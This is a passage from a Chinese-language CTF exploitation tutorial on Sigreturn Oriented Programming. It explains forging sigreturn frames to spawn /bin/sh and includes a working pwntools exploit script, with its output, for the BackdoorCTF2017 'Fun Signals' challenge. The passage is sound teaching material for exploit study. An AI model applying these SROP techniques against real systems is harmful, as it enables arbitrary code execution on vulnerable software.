<p>通过设置 <code>eax/rax</code> 寄存器，可以利用 <code>syscall</code> 指令执行任意的系统调用，然后我们可以将 <code>sigreturn</code> 和 其他的系统调用串起来，形成一个链，从而达到任意代码执行的目的。下面是一个伪造 frame 的例子：</p>
<p><img alt="" src="../../pic/6.1.4_fake_frame.jpg" /></p>
<p><code>rax=59</code> 是 <code>execve</code> 的系统调用号，参数 <code>rdi</code> 设置为字符串“/bin/sh”的地址，<code>rip</code> 指向系统调用 <code>syscall</code>，最后，将 <code>rt_sigreturn</code> 设置为 <code>sigreturn</code> 系统调用的地址。当 <code>sigreturn</code> 返回后，就会从这个伪造的 frame 中恢复寄存器，从而拿到 shell。</p>
<p>下面是一个更复杂的例子：</p>
<p><img alt="" src="../../pic/6.1.4_attack.png" /></p>
<ol>
<li>首先利用一个栈溢出漏洞，将返回地址覆盖为一个指向 <code>sigreturn</code> gadget 的指针。如果只有 <code>syscall</code>，则将 RAX 设置为 0xf，也是一样的。在栈上覆盖上 fake frame。其中：</li>
<li><code>RSP</code>：一个可写的内存地址</li>
<li><code>RIP</code>：<code>syscall; ret;</code> gadget 的地址</li>
<li><code>RAX</code>：<code>read</code> 的系统调用号</li>
<li><code>RDI</code>：文件描述符，即从哪儿读入</li>
<li><code>RSI</code>：可写内存的地址，即写入到哪儿</li>
<li><code>RDX</code>：读入的字节数，这里是 306</li>
<li><code>sigreturn</code> gadget 执行完之后，因为设置了 <code>RIP</code>，会再次执行 <code>syscall; ret;</code> gadget。payload 的第二部分就是通过这里读入到文件描述符的。这一部分包含了 3 个 <code>syscall; ret;</code>，fake frame 和其他的代码或数据。</li>
<li>接收完数据或，<code>read</code> 函数返回，返回值即读入的字节数被放到 <code>RAX</code> 中。我们的可写内存被这些数据所覆盖，并且 <code>RSP</code> 指向了它的开头。然后 <code>syscall; ret;</code> 被执行，由于 <code>RAX</code> 的值为 306，即 <code>syncfs</code> 的系统调用号，该调用总是返回 0，而 0 又是 <code>read</code> 的调用号。</li>
<li>再次执行 <code>syscall; ret;</code>，即 <code>read</code> 系统调用。这一次，读入的内容不重要，重要的是数量，让它等于 15，即 <code>sigreturn</code> 的调用号。</li>
<li>执行第三个 <code>syscall; ret;</code>，即 <code>sigreturn</code> 系统调用。从第二个 fake frame 中恢复寄存器，这里是 <code>execve(&quot;/bin/sh&quot;, ...)</code>。另外你还可以调用 <code>mprotect</code> 将某段数据变为可执行的。</li>
<li>执行 <code>execve</code>，拿到 shell。</li>
</ol>
<h2 id="pwnlibropsrop">pwnlib.rop.srop<a class="headerlink" href="#pwnlibropsrop" title="Permanent link">&para;</a></h2>
<p>在 pwntools 中已经集成了 SROP 的利用工具，即 <a href="http://docs.pwntools.com/en/stable/rop/srop.html">pwnlib.rop.srop</a>，直接使用类 <code>SigreturnFrame</code>，我们来看一下它的构造：
<div class="codehilite"><pre><span></span><span class="o">&gt;&gt;&gt;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">context</span><span class="o">.</span><span class="n">arch</span>
<span class="s1">&#39;i386&#39;</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">SigreturnFrame</span><span class="p">(</span><span class="n">kernel</span><span class="o">=</span><span class="s1">&#39;i386&#39;</span><span class="p">)</span>
<span class="p">{</span><span class="s1">&#39;es&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esp_at_signal&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;fs&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;gs&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;edi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;eax&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ebp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;cs&#39;</span><span class="p">:</span> <span class="mi">115</span><span class="p">,</span> <span class="s1">&#39;edx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ebx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ds&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;trapno&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ecx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;eip&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;err&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ss&#39;</span><span class="p">:</span> <span class="mi">123</span><span class="p">,</span> <span class="s1">&#39;eflags&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;fpstate&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">}</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">SigreturnFrame</span><span class="p">(</span><span class="n">kernel</span><span class="o">=</span><span class="s1">&#39;amd64&#39;</span><span class="p">)</span>
<span class="p">{</span><span class="s1">&#39;es&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esp_at_signal&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;fs&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;gs&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;edi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;eax&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ebp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;cs&#39;</span><span class="p">:</span> <span class="mi">35</span><span class="p">,</span> <span class="s1">&#39;edx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ebx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ds&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;trapno&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ecx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;eip&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;err&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;ss&#39;</span><span class="p">:</span> <span class="mi">43</span><span class="p">,</span> <span class="s1">&#39;eflags&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;fpstate&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;esi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">}</span>
<span class="o">&gt;&gt;&gt;</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">SigreturnFrame</span><span class="p">(</span><span class="n">kernel</span><span class="o">=</span><span class="s1">&#39;amd64&#39;</span><span class="p">)</span>
<span class="p">{</span><span class="s1">&#39;r14&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r15&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r12&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rsi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r10&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r11&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;&amp;fpstate&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rip&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;csgsfs&#39;</span><span class="p">:</span> <span class="mi">51</span><span class="p">,</span> <span class="s1">&#39;uc_stack.ss_flags&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;oldmask&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;sigmask&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rsp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rax&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r13&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;cr2&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r9&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rcx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;trapno&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;err&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rbx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;uc_stack.ss_sp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;r8&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rdx&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rbp&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;uc_flags&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;__reserved&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;&amp;uc&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;eflags&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;rdi&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;uc_stack.ss_size&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">}</span>
</pre></div>
总共有三种，结构和初始化的值会 有所不同：
- i386 on i386：32 位系统上运行 32 位程序
- i386 on amd64：64 位系统上运行 32 位程序
- amd64 on amd64：64 为系统上运行 64 位程序</p>
<h2 id="backdoorctf2017-fun-signals">BackdoorCTF2017 Fun Signals<a class="headerlink" href="#backdoorctf2017-fun-signals" title="Permanent link">&para;</a></h2>
<p><div class="codehilite"><pre><span></span>$ file funsignals_player_bin
funsignals_player_bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
</pre></div>
这是一个 64 位静态链接的 srop，可以说是什么都没开。。。
<div class="codehilite"><pre><span></span>$ checksec -f funsignals_player_bin
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY  Fortified Fortifiable  FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   No       0               0       funsignals_player_bin
</pre></div>
<div class="codehilite"><pre><span></span>gdb-peda$ disassemble _start
Dump of assembler code for function _start:
   0x0000000010000000 &lt;+0&gt;:     xor    eax,eax
   0x0000000010000002 &lt;+2&gt;:     xor    edi,edi
   0x0000000010000004 &lt;+4&gt;:     xor    edx,edx
   0x0000000010000006 &lt;+6&gt;:     mov    dh,0x4
   0x0000000010000008 &lt;+8&gt;:     mov    rsi,rsp
   0x000000001000000b &lt;+11&gt;:    syscall
   0x000000001000000d &lt;+13&gt;:    xor    edi,edi
   0x000000001000000f &lt;+15&gt;:    push   0xf
   0x0000000010000011 &lt;+17&gt;:    pop    rax
   0x0000000010000012 &lt;+18&gt;:    syscall
   0x0000000010000014 &lt;+20&gt;:    int3   
End of assembler dump.
gdb-peda$ disassemble syscall
Dump of assembler code for function syscall:
   0x0000000010000015 &lt;+0&gt;:     syscall
   0x0000000010000017 &lt;+2&gt;:     xor    rdi,rdi
   0x000000001000001a &lt;+5&gt;:     mov    rax,0x3c
   0x0000000010000021 &lt;+12&gt;:    syscall
End of assembler dump.
gdb-peda$ x/s flag
0x10000023 &lt;flag&gt;:      &quot;fake_flag_here_as_original_is_at_server&quot;
</pre></div>
而且 flag 就在二进制文件里，只不过是在服务器上的那个里面，过程是完全一样的。</p>
<p>首先可以看到 <code>_start</code> 函数里有两个 syscall。第一个是 <code>read(0, $rip, 0x400)</code>（调用号<code>0x0</code>），它从标准输入读取 <code>0x400</code> 个字节到 <code>rip</code> 指向的地址处，也就是栈上。第二个是 <code>sigreturn()</code>（调用号<code>0xf</code>），它将从栈上读取 sigreturn frame。所以我们就可以伪造一个 frame。</p>
<p>那么怎样读取 flag 呢，需要一个 <code>write(1, &amp;flag, 50)</code>，调用号为 <code>0x1</code>，而函数 <code>syscall</code> 正好为我们提供了 <code>syscall</code> 指令，构造 payload 如下：
<div class="codehilite"><pre><span></span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./funsignals_player_bin&#39;</span><span class="p">)</span>
<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./funsignals_player_bin&#39;</span><span class="p">)</span>
<span class="c1"># io = remote(&#39;hack.bckdr.in&#39;, 9034)</span>

<span class="n">context</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span>
<span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s2">&quot;amd64&quot;</span>

<span class="c1"># Creating a custom frame</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">SigreturnFrame</span><span class="p">()</span>
<span class="n">frame</span><span class="o">.</span><span class="n">rax</span> <span class="o">=</span> <span class="n">constants</span><span class="o">.</span><span class="n">SYS_write</span>
<span class="n">frame</span><span class="o">.</span><span class="n">rdi</span> <span class="o">=</span> <span class="n">constants</span><span class="o">.</span><span class="n">STDOUT_FILENO</span>
<span class="n">frame</span><span class="o">.</span><span class="n">rsi</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;flag&#39;</span><span class="p">]</span>
<span class="n">frame</span><span class="o">.</span><span class="n">rdx</span> <span class="o">=</span> <span class="mi">50</span>
<span class="n">frame</span><span class="o">.</span><span class="n">rip</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;syscall&#39;</span><span class="p">]</span>

<span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">frame</span><span class="p">))</span>
<span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</pre></div>
<div class="codehilite"><pre><span></span>$ python2 exp_funsignals.py
[*] &#39;/home/firmy/Desktop/funsignals_player_bin&#39;
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
[+] Opening connection to 127.0.0.1 on port 10001: Done
[*] Switching to interactive mode
fake_flag_here_as_original_is_at_server\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[*] Got EOF while reading in interactive
</pre></div>
如果连接的是远程服务器，<code>fake_flag_here_as_original_is_at_server</code> 会被替换成真正的 flag。</p>
<p>这一节我们详细介绍了 SROP 的原理，并展示了一个简单的例子，在后面的章节中，会展示其更复杂的运用，包扩结合 vDSO 的用法。</p>
<h2 id="_1">参考资料<a class="headerlink" href="#_1" title="Permanent link">&para;</a></h2>
<ul>
<li><a href="http://www.ieee-security.org/TC/SP2014/papers/FramingSignals-AReturntoPortableShellcode.pdf">Framing Signals—A Return to Portable Shellcode</a></li>
<li><a href="https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf">slides: Framing Signals a return to portable shellcode</a></li>
<li><a href="https://www.slideshare.net/AngelBoy1/sigreturn-ori">Sigreturn Oriented Programming</a></li>
<li><a href="https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf">Sigreturn Oriented Programming is a real Threat</a></li>
<li><a href="http://www.freebuf.com/articles/network/87447.html">Sigreturn Oriented Programming (SROP) Attack攻击原理</a></li>
</ul>
                
                  
                
              
              
                
              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid">
        
          <a href="../6.1.3_pwn_xdctf2015_pwn200/" title="XDCTF2015 pwn200" class="md-flex md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-back md-footer-nav__button"></i>
            </div>
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  后退
                </span>
                XDCTF2015 pwn200
              </span>
            </div>
          </a>
        
        
          <a href="../6.1.5_pwn_grehackctf2017_beerfighter/" title="GreHackCTF2017 beerfighter" class="md-flex md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  前进
                </span>
                GreHackCTF2017 beerfighter
              </span>
            </div>
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-forward md-footer-nav__button"></i>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
        powered by
        <a href="http://www.mkdocs.org">MkDocs</a>
        and
        <a href="https://squidfunk.github.io/mkdocs-material/">
          Material for MkDocs</a>
      </div>
      
        
      
    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../../../assets/javascripts/application.02434462.js"></script>
      
        
        
          
          <script src="../../../assets/javascripts/lunr/lunr.stemmer.support.js"></script>
          
            
              
                <script src="../../../assets/javascripts/lunr/tinyseg.js"></script>
              
              
                <script src="../../../assets/javascripts/lunr/lunr.jp.js"></script>
              
            
          
          
        
      
      <script>app.initialize({version:"0.17.2",url:{base:"../../.."}})</script>
      
        <script src="../../../_static/js/extra.js"></script>
      
        <script src="https://cdn.bootcss.com/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_CHTML"></script>
      
    
    
      
    
  </body>
</html>